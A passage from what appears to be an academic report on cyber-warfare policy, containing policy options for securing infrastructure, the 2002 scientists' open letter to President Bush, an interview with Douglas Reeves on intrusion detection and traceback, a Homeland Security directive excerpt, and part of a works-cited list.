electronic manifest data. An additional option to consider is an incentive program for

companies that implement and document measures taken to secure electronic

shipment manifests and shipment tracking systems.

Policy Option 6.7.6: Make available and widely publicize a national database of

cyber-incidents and attempted cyber-attacks at critical infrastructure components such

as transportation, power, and communication systems. By increasing the public’s

126

attention to these areas, such a database could add pressure on infrastructure

companies to focus more on their own cyber-security prevention and response

Policy Option 6.7.7: Increase funding for university-level research of cyber-security

and preparedness measures, and provide funding for universities and community

colleges to create dedicated cyber-security training and research programs. This

could significantly improve the training of America’s future IT workforce.

Policy Option 6.7.8: Create a cyber-warfare threat level indicator system, possibly

similar to the Department of Homeland Security’s color-coded daily threat level

indicator. This sort of indicator system could be used by media outlets to help

publicize the issue of cyber-security, and would increase overall awareness of the

issue across all sectors.

Policy Option 6.8.1: Mandate user password complexity and frequent changes, log-

outs after a short time of inactivity, and require secondary identification (in the form

of ID cards required to run the computer).

Policy Option 6.8.2: IT departments should be required to submit system structure

documents, detailing the systems used throughout their agency. Departments should

institute a government wide internet control program to restrict potentially threatening

website access. Additionally, they must show prompt response and 100%

implementation of security patches for their systems.

Policy Option 6.8.3: Mandate that the future development of the FAA's air traffic

control system continue to favor decentralized, redundant regional control centers.

This will ensure that it remains impractical for a cyber-attack to disable the air traffic

system on a nationwide level. One possibility is to make backup computer systems

run in parallel with the main systems, but with a different implementation (e.g. a

different hardware configuration or operating system), so a vulnerability exploited on

the main system may not affect the backup.

Policy Option 6.8.4: Require that the FAA (or other government agencies) limit

outside IT contractors' access to the computer systems they are directly involved with.

As discussed previously in Section 3.4.3.2, contractors are currently given full access

to systems that are not relevant to their work assignments. This simple measure

would limit the risk of an outside contractor inserting malicious code into the

agency's computer systems, and remove one vulnerability from the air traffic control

system.

Policy Option 6.8.5: Use best-value evaluations when selecting outside contractors.

The OMB should establish which IT contractors present the best services, and

encourage agencies to select the best contractor and not the lowest bid. Additionally,

the OMB could establish a certification system for IT contractors to complete and

show minimum proficiency.

127

Policy Option 6.8.6: Require regular ‘red team’ testing of any agency or private

corporation that is connected to the government network. The ‘red team’ should be a

multi-agency force that has regular turnover to ensure new ideas are constantly

applied in security testing.

Policy Option 6.10.1: Continue to integrate cyber-warfare into national strategic

planning, especially in the areas of growing the military and creating or redefining the

mission of the military. This would include increasing the number of units dedicated

to cyber-warfare, and expansion throughout the cyber domain.

Policy Option 6.10.2: Increase funding for cyber education, both in the civilian and

government sectors. Expanding cyber-warfare training in the military would result in

more effective troops, and the civilian sector could offer outside aid and ideas for the

military.

Policy Option 6.10.3: Develop specific national strategies for use of cyber-warfare,

both offensively and defensively, against nations and terrorist organizations. These

policies should focus on the capabilities of foreign powers, as well as specific

technologies that could exploit enemy defenses or thwart their offensive capabilities.

Any technology discussed in these reports should be fully researched to achieve its

maximum effect.

Policy Option 6.10.4: Establish an international convention regarding cyber-warfare,

possibly through the United Nations. Work to establish legal framework for the

tracking and use of cyber-attacks, as well as classifications of cyber-attacks. From

these classifications (military, terrorist, criminal, etc.) establish protocol for

international sanction (if necessary) and rules of engagement or retribution.

128

8.2 Open Letter to the President

27 February 2002

George W. Bush

President of the United States

The White House

1600 Pennsylvania Avenue, NW

Washington, DC 20500

Mr. President,

Our nation is at grave risk of a cyber attack that could devastate the national psyche and

economy more broadly than did the September 11th attack. We, as concerned scientists and

leaders, seek your help and offer ours. The critical infrastructure of the United States, including

electrical power, finance, telecommunications, health care, transportation, water, defense and the

Internet, is highly vulnerable to cyber attack. Fast and resolute mitigating action is needed to

avoid national disaster. We urge you to act immediately by former a Cyber-Warfare Defense

Project modeled in the style of the Manhattan Project.

Consider the following scenario. A terrorist organization announces one morning that they will

shut down the Pacific Northwest electrical power grid for six hours starting at 4:00 PM; they

then do so. The same group then announces that they will disable the primary telecommunication

trunk circuits between the U.S. East and West Coasts for a half day; they then do so, despite our

best efforts to defend against them. Then, they threaten to bring down the air traffic control

system supporting New York City, grounding all traffic and diverting inbound traffic; they then

do so. Other threats follow, and are successfully executed, demonstrating the adversary's

capability to attack our critical infrastructure. Finally, they threaten to cripple e-commerce and

credit card service for a week by using several hundred thousand stolen identities in millions of

fraudulent transactions. Their list of demands is then posted in the New York Times, threatening

further actions if their demands are not met. Imagine the ensuing public panic and chaos. If this

scenario were to unfold, Americans everywhere would feel that our national sovereignty had

been compromised; we would wonder how, as a nation, we could have let this happen.

Mr. President, what makes this scenario both interesting and alarming is that all of the

aforementioned events have already happened, albeit not concurrently nor all by malicious

intent. They occurred as isolated events, spread out over time; some during various technical

failures, some during simple (government-sponsored) exercises, and some during real-world

cyber attacks. All of them, however, could be effected through remote cyber attack by any

adversary who so chooses, whether individual or state-sponsored. The resources required are

modest -- far less than the cost of one army tank. All that is required is a small group of

competent computer scientists, a few inexpensive PCs, and Internet access. Even the smallest

nation-states and terrorist organizations can easily muster such capabilities, let alone better-

organized groups such as Al Qaeda.

129

Many nations, including Iran and China, for example, have already developed cyber-offense

capabilities that threaten our economy and the economies of our allies.

There is no doubt that such a serious national vulnerability is a real and present danger. This has

been affirmed by a number of distinguished bodies, including the President's Commission on

Critical Infrastructure Protection (1997), the National Academy of Sciences (Computers at Risk,

1990; Trust in Cyberspace, 1999), and the U.S. Defense Science Board on Information Warfare

Defense (1996, 2000).

The consequence of successfully exploiting these vulnerabilities would be significant damage to

the U.S. economy, degraded public trust with concomitant long-term retardation of economic

growth, degradation in quality of life, and a severe erosion of the public's confidence that the

government can adequately protect their security. We have seen the amplification effects, on our

economy and on public apprehension, from a single event such as the World Trade Center and

Pentagon attacks. Aggregate damages resulting from amateur cyber attacks (e.g., 1998 Internet

Worm, Melissa Virus, I-LOVE-YOU virus, Code Red Virus and the Nimda virus) are estimated

to have been $12 billion for the year 2001 alone. Extrapolating from this, a professionally-

executed, coordinated cyber attack on our national critical infrastructure could easily result in a

100-fold amplification -- 10-fold from being professionally-executed and another 10-fold from

indirect e-commerce suppression effects. In terms of a dollar value, this could amount to several

hundred billion dollars in damage to the U.S. economy. Moreover, some community experts and

reports (such as those cited above) estimate a high probability of a serious attack on U.S. critical

infrastructure within the next few years.

The goal of our proposed Manhattan-style undertaking would be to create a national-scale cyber-

defense policy and capability to prevent, detect, and respond to cyber threats to our critical

infrastructure. We mean Manhattan-style in several senses: national priority, inclusion of top

scientists, focus, scope, investment, and urgency with which a national capability must be

developed. To prevent attacks, we need a coordinated effort to work with our critical-

infrastructure providers in defending their most critical information systems. To detect attacks,

we need to permeate our critical networks with a broad sensor grid imbued with the capability to

detect large-scale attacks by correlating and fusing seemingly unrelated events that are, in fact,

part of a coordinated attack. To respond to attacks, we need to devise strategies and tactics to

pre-plan effective actions in the face of major cyber-attack scenarios; we need to augment our

national infrastructure with mechanisms that support the defined strategies and tactics when

attacks are detected and verified. We believe that all this can be done with a close partnership

between the public and private sectors while maintaining sensitivity to public concerns about

privacy and fairness, consistent with American values and laws. The result should be a resilient

critical infrastructure that is resistant to cyber attack, plus next-generation technology which

enables our critical infrastructure to be more easily secured. Given private-sector economic

realities, our nation's economy and well-being will continue to rely on the existing vulnerable

infrastructure for the indefinite future, unless strong government investment leads the way.

The proposed Manhattan-style cyber-defense project will cost a fraction of the expense we will

incur from a single major cyber attack. We estimate the project would require an investment of

$500 million per year initially, and could reach the billion dollar level in the out-years. The

130

project would run over the course of five years to create a national-scale initial operating

capability no later than year three, and more advanced defensive and offensive capabilities by

year five. We recommend that you appoint a small board of top computer scientists and

engineers to work out the details of a plan, and set the plan in motion within ninety days. The

plan should include an appropriate balance between engineering and focused research to support

the national capability and the policy, laws, and procedures that would be needed to deploy and

support the cyber-defense technology.

The clock is ticking. We look to you, as America's leader, to act on behalf of the nation. Your

conscientious and effective defense of our physical homeland should extend into the increasingly

vital frontier of U.S. cyberspace. We anticipate that the nation will fully endorse and even expect

this forward-thinking and courageous action in the face of such a major threat to national

security. We stand ready to help in any way we can in taking this very important next step to

defend our country.

Very respectfully,

[signed]

O. Sami Saydjari Founder Cyber Defense Research

Center

Former Information Assurance

Program

Manager, DARPA

Former Fellow, National Security

Agency

Dr. Robert Balzer Chief Technology Officer

Teknowledge Corporation

Terry C. Vickers Benzel Vice President of Advanced

Security Research

Network Associates, Inc.

Thomas A. Berson, Ph.D. Principal Scientist, Palo Alto

Research Center

Past-President, International

Association for Cryptologic

Research

Past-Chair, IEEE Technical

Committee on

Security and Privacy

Bob Blakely Chief Scientist, Security and

Privacy

Salvatore J. Stolfo Professor of Computer Science

Columbia University

Dr. Curtis R. Carlson Chief Executive Officer

SRI International

George Cybenko Dorothy and Walter Gramm

Professor

Thayer School of Engineering

Dartmouth College

John C. Davis Director of Information Security

Mitretek Systems Inc.

Former Commissioner on PCCIP

Former Director of NCSC/NSA

Matt Donlon Former Director, Security and

Intelligence Office

Defense Advanced Research

Projects

Agency

Patrick Lincoln Member of Defense Science

Board Panels

2000-2001

Roy A. Maxion, Ph.D. Director, Dependable Systems

Laboratory

Computer Science Department

Carnegie Mellon University

David J. Farber Moore Professor of

Telecommunications and

Professor of Business and Public

Policy

University of Pennsylvania

Richard J. Feiertag Manager of Strategic Planning

NAI Labs, Security Research

Division


Edward A. Feigenbaum Kumagai Professor of Computer

Science

Emeritus

Stanford University, and

Chief Scientist, United States Air

Force

(1994-97)

Dr. Tiffany M. Frazier Director, Advanced Computing

131

IBM Tivoli Software

Seymour E. Goodman Professor of International Affairs

and Computing

Co-Director, Georgia Tech

Information Security Center

Georgia Institute of Technology

Dr. J. Thomas Haigh Chief Technology Officer

Secure Computing Corporation

Walter L. Heimerdinger, PhD

Patrick M. Hughes Lieutenant General, U.S. Army,

Retired

President, PMH Enterprises LLC

Former Director, Defense

Intelligence

Agency

Former Director of Intelligence (J-

2),

Joint Chiefs of Staff

Stephen T. Kent Chief Scientist -- Information

Security

BBN Technologies -- A Verizon

Company

(member of "Computers at Risk"

& "Trust

in Cyber Space" NRC committees)

Angelos D. Keromytis Assistant Professor,

Computer Science Dept.

Columbia University

Dr. Marvin J. Langston Deputy Chief Information Officer,

Department of Defense, 1998-

2001

Director Information Systems

Office,


Projects

Agency, 1997-98

Chief Information Officer,

Department of

Navy, 1996-1997

Karl N. Levitt

Director, Computer Science

Laboratory

SRI International

John H. Lowry Division Engineer

Technical Director for Information

Security

BBN Technologies/Verizon

Stephen J. Lukasik Consultant, Science Applications

International Corporation

Former Director, Department of


Projects Agency

Former Chief Scientist, Federal

Communications Commission

David Luckham Research Professor of Electrical

Engineering

Stanford University

Dr. Joseph Markowitz

Robert T. Marsh General, USAF (Retired)

Former Chairman, President's

Commission on Critical

Infrastructure

Protection

Terry Mayfield Institute for Defense Analyses

J.M. McConnell Former Director, National

Security Agency

John McHugh, PhD Carnegie Mellon University

Fred B. Schneider Professor of Computer Science

and

Director of Cornell/AFRL

Information

Assurance Institute

Gregg Schudel Formerly, Senior Engineer and

Manager

of Experimentation, DARPA

Alphatec, Inc.

Roderick A. Moore Systems Engineer

Former National Security Council

Staff

Pres. Reagan and Pres. Bush

Administrations

Dr. Charles L. Moorefield Board Chairman,

Alphatech, Inc.

Peter G. Neumann Computer Science Lab

SRI International

Dr. Clifford Neuman Sr. Research Scientist and

Associate Division Director --

Computer Networks Division

Information Sciences Institute

University of Southern California

E. Rogers Novak, Jr. Managing Member

Novak Biddle Venture Partners

Allen E. Ott Orincon Information Assurance

President

Dr. Michael Paige Former Director, Xerox PARC

Dr. Vern Paxson Senior Scientist, International

Computer Science Institute

Staff Scientist, Lawrence Berkeley

National Laboratories

Phillip A. Porras Program Director

System Design Laboratory

SRI International

Laura S. Tinnel Deputy Program Manager and

Research

Scientist

Information & Systems Assurance

Group

132

Professor of Computer Science

Director of the UC David Security

Laboratory

Department of Computer Science

University of California, Davis

Marcus Ranum Chief Technology Officer

NFR Security, Inc.

Jaisook Rho Principal Computer Scientist


Dr. Arthur S. Robinson President, System/Technology

Development Corporation

Formerly Technical Director of

RCA

R&D for U.S.N. Aegis Weapons

Systems

S. Shankar Sastry Professor and Chair, Department

of Electrical Engineering and

Computer Sciences

Formerly, Director, Information

Technology Office, DARPA, US

DoD

Information Assistance Program

Larry J. Schumann President, EnterpriseTec, Inc.

Member of the President's

National

Security Telecommunications

Advisory

Committee (1996-2000)

Jonathan M. Smith Professor

Computer and Information

Science Department

University of Pennsylvania

Teknowledge Corporation

J. Douglas Tygar Professor of Computer Science

and Information Management

University of California, Berkeley

J. Kendree Williams Chief Technology Officer

Zel Technologies, LLC

CDR, USN (Ret)

R. James Woolsey Director of Central Intelligence,

1993-95

Larry T. Wright Chairman, Defense Science Board

Task Force on Defensive

Information Operations

2000-2001

133

8.3 Interview with Douglas Reeves

The following are excerpts from an interview with Dr. Douglas Reeves, a member of N.C. State's

Cyber Defense Laboratory, on November 6, 2007.

What is your definition of cyber-warfare?

I'm not sure I have one, but I'll make one up. It's people trying to protect their assets, and people

trying to take advantage of those assets, conflicting with each other. Assets can mean your

computer system, your network, your data, your private information--it could mean a variety of

things.

What kind of research have you done in the area of cybersecurity?

For about seven or eight years, I've worked in the field of network security, which has involved a

number of different projects. I've done some work on intrusion detection, which is how you tell

if someone's attacking you. Sometimes it's not obvious until the damage is already done, so

you'd like to detect it as early as you can. I've also done some work on what I'll generically call

forensics, or finding out who's attacking you. Just as in conventional crime, you want to be able

to prosecute somebody if they've committed a crime. You'd like to know who's attacking your

system.

More recently, I've had a project that has to do with software security. What are the ways in

which people break software, and how can you recognize when something is an attempt to break

or misuse software? The attackers are quite clever, actually. This is one of the more interesting

sides of research in this field, that your adversary is a person--you’re not fighting the laws of

physics, or some abstract cost factors or availability or properties of materials or the capabilities

of manufacturers, the standard stuff that you do in engineering. What you're fighting is other

people, so it's very interesting, because people--including the bad guys--are extremely clever. In

fact, maybe especially the bad guys.

What are some of the projects the Army Research Organization had you work on?

That was mainly for intrusion detection. Most of us now have some form of intrusion detection.

You just call it a virus checker. You know that when you have attachments for emails, you need

to check before you open them whether there's some exploit embedded in that attachment.

Besides what we run on our personal computers, corporations and enterprises like universities

also inspect across the enterprise incoming traffic to see whether it contains attempts to break

into computer systems, or what they can notice when someone's attempting to break into

computer systems. There are a wide variety of products; this type of thing has been available for

at least ten years, and some of them are commercially very successful and well documented.

One common problem with intrusion detection is that it's almost too good. Imagine if you had

an alarm system, and you wanted to be sure that any attempt to break into your home, whether it

was coming through a window or picking a lock or any other means of entry someone might

have, you want to make sure that you detected it, that it was sensitive enough that you would

134

never miss any attempt to break into your home. That would be very desirable, but it would be

very unfortunate if the result was that the alarm was so sensitive that it kept going off all the

time. You know, a bird flies past the building and alarm goes off, or a heavy truck rumbles by

on the road and the system thinks that's a break-in attempt and sets an alarm. So the real

problem with a lot of intrusion detection systems is that to make them very accurate, they're set

to be so sensitive that they squawk about all kinds of stuff, some of which is not attacks and

some of which is.

Another problem is that many attacks are conducted in multiple steps. So, again to take the

analogy of someone breaking into your home or office, maybe there are multiple steps to enter.

Maybe they have to go into an entry gate, then they have to evade detection by a security camera,

and then thirdly they have to figure out the combination to a door lock, and then fourthly they

have to turn off the burglar alarm. So, there's a series of stuff they have to do. Well, if there is

an attack but it takes a hundred steps, and you get an alarm for every one of those steps, then the

combination of being overly sensitive and giving you information about every individual

potential step--and imagine this is not an alarm system for one home or office, but it's for a

thousand places of business, as intrusion detection for an enterprise is--the result of that is that

you, the security administrator, are sitting there in front of a log looking at 10,000 messages a

day go by, and you just can't deal with that volume of information. It's too much. So one choice

is that you turn down your alarm to be less sensitive, so it doesn't keep squawking all the time,

but you stand the chance of missing something if you do that, so there's a tradeoff.

Our particular research was, don't make the alarm systems less sensitive, but process the

information produced by the alarm systems to do some of the kind of mental digestion or

processing of the alarm information that previously had been done in people's head, then present

to them your summary of what that information might mean. Now instead of their being a

hundred events related to a break-in, it might say, "I think there's been a break-in, and if you

want more information, click here and I'll show you the steps that led to me concluding that there

might have been a break-in." Or if you find that there are sequences of events that individually

could be part of attacks, it turns out that those particular sequences of events are exhibited by

innocuous, benign activities that are known to be people accessing databases for legitimate

purposes. Then you can say, "After analyzing the low-level data, I can conclude there's no

reason for you to be alerted this time."

So that's what we were doing for the army--analysis of the data that's used for intrusion detection

systems.

Once an intruder is detected, how difficult is it to detect what geographic location the

intrusion came from?

In general, it's extremely difficult. The joke that I tell in some presentations is that what the

defenders want is what you see in TV shows. In a cop show or whatever, somebody's in a chat

room for pedophiles or something, and they say, "Get a trace on that guy," and then the next

frame they're banging on the door of Apartment 3-G on 65 Main Street, and throwing the guy on

the floor. You want that traceability, not to an IP address, but to a geographic location, because

you want to be able to send the cops or the military to that location.

135

That's what we would all like, but unfortunately, it doesn't work like that. There are many

concealment techniques, many techniques for making it difficult or impossible for someone to

tell where you are when you launch an attack or set an attack in motion. That's been one of our

main research projects for quite a while, is how to combat at least some of the more widely used

techniques.

So, another analogy here is that you're trying to trace somebody and periodically, that person

goes in buildings and you don't have access to those buildings they go into. You can watch all

the exits to see if they emerge at some new location and start on new directions so you don't lose

the trail. But you can't go in the building. But while they're in the building, they can undergo all

kinds of disguises. They can change their shoes, they can stand taller, they can have new facial

hair, they can put on new clothing, they can don glasses, all the standard stuff you can use for

disguise. So you watch all these exits, but you have to somehow detect that it's them coming out

even though they're wearing an elaborate disguise. And particularly if it's a building with lots of

people going in and coming out, that's not exactly trivial to do. It's going to be a pretty difficult

to task.

So what you'd like to do is pick some characteristic of a person that's somewhat difficult to

disguise--not impossible, but somewhat difficult to disguise--and if you key it in on whether they

have a mustache or not, obviously they can put on or shave a mustache. If you key it in on their

weight, it's a little more difficult to disguise their weight. But to use something that's somewhat

similar to what we do, if you key it on the way they walked, it's a little difficult to disguise the

way they walk. You can try to fake a limp or walk faster than you typically do, or shorter steps,

but it turns out the way you walk is fairly characteristic of a person's skeletal structure and

habits. It's not completely straightforward to change the way you walk. So we have conducted

research on the equivalent of this, which is looking at the timing characteristics of traffic, which

are difficult to disguise. They can be modified, but we're able to overcome the simpler

modifications so that people might try to still recognize those timing characteristics.

So is getting into a computer system and hiding your identity something an amateur hacker

can do?

Well, in the hacker community, the term hacker is a contentious term, because in some circles,

the term hacker doesn't mean a bad person, it just means a skilled person. There is another term,

cracker or blackhead or bad guy or something like that, would be more widely agreed upon than

hacker.

The hacker community, unfortunately, shares what they know. They're very generous with each

other. So, they go out of their way to make stuff easy to use and download, and well

documented, and as close to pushbutton automation as you can make it, which means that a

moron can use this stuff. If somebody gives them a link to find whatever it is that they want, to

try it out and direct it at whatever your target is takes almost no intelligence whatsoever. So, it

not hard at all to use these things.

136

8.4 DHS Presidential Directive

December 17, 2003 Homeland Security Presidential Directive

The Homeland Security Presidential Directive of December 17th

, 2003 establishes a more

concrete list of responsibilities assigned to several departments within the United States

Government.

265

Bush, George W. "December 17, 2003 Homeland Security Presidential Directive." The White House. 17 Dec.

2003. US Government. <http://www.whitehouse.gov/news/releases/2003/12/20031217-5.html>.

(a) The Department of State, in conjunction with the Department, and the Departments of Justice, Commerce, Defense, the

Treasury and other appropriate agencies, will work with foreign countries and international organizations to strengthen the

protection of United States critical infrastructure and key resources.

(b) The Department of Justice, including the Federal Bureau of Investigation, will reduce domestic terrorist threats, and

investigate and prosecute actual or attempted terrorist attacks on, sabotage of, or disruptions of critical infrastructure and key

resources. The Attorney General and the Secretary shall use applicable statutory authority and attendant mechanisms for

cooperation and coordination, including but not limited to those established by presidential directive.

(c) The Department of Commerce, in coordination with the Department, will work with private sector, research, academic,

and government organizations to improve technology for cyber systems and promote other critical infrastructure efforts,

including using its authority under the Defense Production Act to assure the timely availability of industrial products,

materials, and services to meet homeland security requirements.

(d) A Critical Infrastructure Protection Policy Coordinating Committee will advise the Homeland Security Council on

interagency policy related to physical and cyber infrastructure protection. This PCC will be chaired by a Federal officer or

employee designated by the Assistant to the President for Homeland Security.

(e) The Office of Science and Technology Policy, in coordination with the Department, will coordinate interagency research

and development to enhance the protection of critical infrastructure and key resources.

(f) The Office of Management and Budget (OMB) shall oversee the implementation of government-wide policies, principles,

standards, and guidelines for Federal government computer security programs. The Director of OMB will ensure the

operation of a central Federal information security incident center consistent with the requirements of the Federal

Information Security Management Act of 2002.

(g) Consistent with the E-Government Act of 2002, the Chief Information Officers Council shall be the principal interagency

forum for improving agency practices related to the design, acquisition, development, modernization, use, operation, sharing,

and performance of information resources of Federal departments and agencies.

(h) The Department of Transportation and the Department will collaborate on all matters relating to transportation security

and transportation infrastructure protection. The Department of Transportation is responsible for operating the national air

space system. The Department of Transportation and the Department will collaborate in regulating the transportation of

hazardous materials by all modes (including pipelines).

(i) All Federal departments and agencies shall work with the sectors relevant to their responsibilities to reduce the

consequences of catastrophic failures not caused by terrorism265

137

8.5 Works Cited

Airsnort Homepage. 31 Dec 2004. The Schmoo Group. 30 Oct 2007. <http://airsnort.shmoo.com/>.

Alford, Jr., Lt. Col. Lionel D. "Cyber Warfare: Protecting Military Systems." Acquisition Review Quarterly Spring

2000: 101-120. 18 Oct. 2007 http://www.dau.mil/pubs/arq/2000arq/alford.pdf




Brewin, Bob (2007) “Army, Air Force seek to go on offensive in cyber war” 30 October, 2007.

http://www.govexec.com/story_page.cfm?filepath=/dailyfed/0607/061307bb1.htm

Bush, George W., and Jim Turner. "E-Government Act of 2002." The White House. 15 Nov. 2002. US Government.

<http://www.whitehouse.gov/omb/egov/g-4-act.html>.

http://www.buyerzone.com/facilities/generators/rbic-taking-stock.html



<http://www.tswg.gov/tswg/ip/The_Myths_and_Facts_behind_Cyber_Security_Risks.pdf>.

“Capital Commerce. So How Goes Bin Laden’s War on the U.S. Economy?” Pethokoukis, James. September 11,

2007

CENTCOM Operation Iraqi Freedom Briefing - 25 March 2003” October 30, 2007.

<http://www.gulfinvestigations.net/document348.html?PHPSESSID=64c6f060d1f4997faf0ff91799fa777f>

CERT Coodination Center – Denial of Service Attacks. 4 Jun 2001. US CERT. 30 Oct 2007

http://www.cert.org/tech_tips/denial_of_service.html

http://www.cfr.org/content/publications/attachments/Homeland_TF.pdf

Clough, B.T., Cope, B., & Donley, S. (1993). Microwave induced upset of digital flight control systems. Digital

Avionics Systems Conference. 12, 179-184.

http://www.cooperativeresearch.org/entity.jsp?entity=eiffel_tower Profile: Eiffel Tower. December 24, 1994: Al-

Qaeda Connected Militants Attempt to Crash Passenger Jet into Eiffel Tower.

"Computer Crime Cases." Computer Crime and Intellectual Property Section. US Department of Justice.

<http://www.usdoj.gov/criminal/cybercrime/cccases.html>.

Convention on Cybercrime. Council of Europe. 23 Nov. 2001

http://conventions.coe.int/Treaty/Commun/QueVoulezVous.asp?NT=185&CL=ENG

Crenshaw, Adrian. A Quick Intro to Sniffers. 30 July 2007. Iron Geek.com. 30 Oct 2007.


Critical Infrastructure Assurance Group Online. Retrieved November 1, 2007, from Security@Cisco Web site:

http://www.cisco.com/web/about/security/security_services/ciag/index.html


http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/

http://airsnort.shmoo.com/

http://www.dau.mil/pubs/arq/2000arq/alford.pdf

http://www.acp-international.com/southtx/docs/ne2003.pdf

http://www.govexec.com/story_page.cfm?filepath=/dailyfed/0607/061307bb1.htm

http://www.cert.org/tech_tips/denial_of_service.html

http://www.cfr.org/content/publications/attachments/Homeland_TF.pdf

http://www.cooperativeresearch.org/entity.jsp?entity=eiffel_tower

http://conventions.coe.int/Treaty/Commun/QueVoulezVous.asp?NT=185&CL=ENG


http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/

138

“Cyber War Nightmares” (2006), 30 October, 2007.

http://www.strategypage.com/htmw/htiw/articles/20060829.aspx

“Cyberwarfare on the Electricity Infrastructure.” Office of Scientific and Technical Information. 12 Sep. 2007. <

http://www.osti.gov/bridge/product.biblio.jsp?osti_id=769245>

Dagon, David. Mobile Phones as Computing Devices: The Viruses Are Coming!. IEEE – Pervasive Computing. Oct

– Dec 2004. 11 – 15

“Data and Statistics”. International Monetary Fund. 17 Oct 2007. 27 Oct 2007.

<http://www.imf.org/external/data.htm#data>

Denning, D. (2001). "Is Cyber Terror Next?" New York: U.S. Social Science Research Council, at


Delio, Michelle. Crackers Expand Private War. 18 Apr 2001. Wired Magazine. 30 Oct 2002.

<http://www.wired.com/politics/law/news/2001/04/43134?currentPage=2>

Delio, A Chinese Call to Hack the US. 11 Apr 2001. Wired Magazine. 30 Oct 2002.

<http://www.wired.com/politics/law/news/2001/04/42982?currentPage=2>

Denning, Dorathy. "Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing Foreign

Policy." Internet and International Systems. December 1999: 101-120. 28 Oct. 2007

<http://www.nautilus.org/gps/info-policy/workshop/papers/denning.html>

De Souza Reis, Ademar, and Filho, Milton Soares. Sniffdet – Remote Sniffer Detector for Linux. 10 Oct 2006.

SourceForge.net. 30 Oct 2007. <http://sniffdet.sourceforge.net/>.

Dittrich, David. The DoS Project's "trinoo" distributed denial of service attack tool. 21 Oct 1999. University of

Washington. http://staff.washington.edu/dittrich/misc/trinoo.analysis

Dot.Con: The Dangers of Cyber Crime and a Call for Proactive Solutions. Granville, J.. Australian Journal of

Politics & History. March, 2003, Vol. 49 Issue 1. Pg. 104

Dumpster Diving. Washington State Office of the Attorney General. 26 Nov 2007.

http://www.atg.wa.gov/ConsumerIssues/ID-Privacy/DumpsterDiving.aspx

http://www.epri-


df

Evers, Joris. Russian hackers ‘sold WMF exploit’. 3 Feb 2006. ZDNet.co.uk. 26 Nov 2007.

http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm

FAA Air Traffic Organization. (2006). Moving America safely: 2005 annual performance report Washington, D.C.:

Federal Aviation Administration.

"Fact Sheet: Protecting America’S Critical Infrastructure – Cyber Security." US-CERT. Department of Homeland

Security. <http://www.us-cert.gov/press_room/050215cybersec.html>.

http://www.fas.org/irp/crs/RL30735.pdf

"FISMA." National Institute of Standards and Technology. 24 Oct. 2002. US Government.

<http://csrc.nist.gov/groups/SMA/fisma/>.

http://www.strategypage.com/htmw/htiw/articles/20060829.aspx




http://sniffdet.sourceforge.net/

http://staff.washington.edu/dittrich/misc/trinoo.analysis

http://www.atg.wa.gov/ConsumerIssues/ID-Privacy/DumpsterDiving.aspx

http://www.epri-intelligrid.com/intelligrid/docs/Cost_of_Power_Disturbances_to_Industrial_and_Digital_Technology_Companies.pdf



http://news.zdnet.co.uk/software/0,1000000121,39250232,00.htm

139

http://www.frontpagemag.com/articles/Read.aspx?GUID={245984FA-D9DF-46E9-8EF3-7B5259A51C0D} Clinton

and 9/11. Favish, Allen J. FrontPageMagazine.com Tuesday, October 14, 2003.


http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html

Gagnon, B. (2004). Are We Headed For a Cyber-09/11? The American Failure in Cyberstrategy. Conference Papers

-- International Studies Association, Retrieved October 24, 2007, from Academic Search Premier database.

http://www.gao.gov/new.items/d05712.pdf

Garber, Lee. Denial-of-Service Attacks Rip The Internet . IEEE – Computer. Apr 2000. 12 – 17

Garretson, Cara. Spam that delivers a pink slip. ComputerWorld.com. 1 Nov 2006. 26 Nov 2007.

http://computerworld.com/action/article.do?articleId=9004698&command=viewArticleBasic&taxonomyName=secu

rity



Glaessner, Thomas, Tom Kellermann, and Valerie McNevin (2002). “Electronic Security: Risk Mitigation In

Financial Transactions”. The World Bank. p 43. 29 Oct 2007.

<http://info.worldbank.org/etools/docs/library/83592/esecurity_risk_mitigation.pdf>

Global Society: Journal of Interdisciplinary International Relations; Jan2003, Vol. 17 Issue 1, p89, 9p



Organization.



Greenwell, W.S. and J.G. Alsbrooks (2007). Excerpt From "Digital Control Systems". Retrieved November 3, 2007,

from IEEE Computer Society Web site:

http://www.computer.org/portal/site/ieeecs/menuitem.c5efb9b8ade9096b8a9ca0108bcd45f3/index.jsp?&pName=iee

ecs_level1&path=ieeecs/ReadyNotes&file=s_k_sample.xml&xsl=generic.xsl&


http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&orde

r=0&thold=0

Gwin, Peter. (2001) “Is the Internet the Next Front in the Terror War?” Europe. Issue 410.

Hancock, Bill. National Infrastructure Protection Issues. International Telecommunication Union. 2002. 25 Oct.

2007 <http://www.itu.int/osg/spu/ni/security/workshop/presentations/cni.18.pdf>.

Harold Joseph Highland. A history of computer viruses -- Introduction, Computers & Security. Vol 16, Issue 5.

1997, p 412-415.

http://www.sciencedirect.com/science/article/B6V8G-3SX269W-2P/2/e96ee1d35ae6e62abd338c29a32234a7

Harris, Leslie, http://abcnews.go.com/Technology/Story?id=3771510&page=1

Heise Security (2007, October 11). Report: Cisco closes down Critical Infrastructure Assurance security research

group. Retrieved November 3, 2007, from Heise Security Web site: http://www.heise-security.co.uk/news/97205

http://www.frontpagemag.com/articles/Read.aspx?GUID=%7b245984FA-D9DF-46E9-8EF3-7B5259A51C0D%7d

http://archives.cnn.com/2001/TECH/internet/04/26/hacker.warning/index.html

http://www.gao.gov/new.items/d05712.pdf

http://computerworld.com/action/article.do?articleId=9004698&command=viewArticleBasic&taxonomyName=security

http://computerworld.com/action/article.do?articleId=9004698&command=viewArticleBasic&taxonomyName=security

http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&order=0&thold=0

http://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=6388&mode=thread&order=0&thold=0

http://www.sciencedirect.com/science/article/B6V8G-3SX269W-2P/2/e96ee1d35ae6e62abd338c29a32234a7

http://www.heise-security.co.uk/news/97205

140


<http://www.fas.org/irp/crs/RL30735.pdf>.

“Homeland Security and Defense Telecommunications Spending to Increase 40 Percent by 2009.” Business Wire. 3

August 2004. 28 Oct. 2007. <http://findarticles.com/p/articles/mi_m0EIN/is_2004_August_3/ai_n6139915>

http://www.fas.org/irp/threat/frd.html The Sociology and Psychology of Terrorism: Who Becomes a Terrorist and

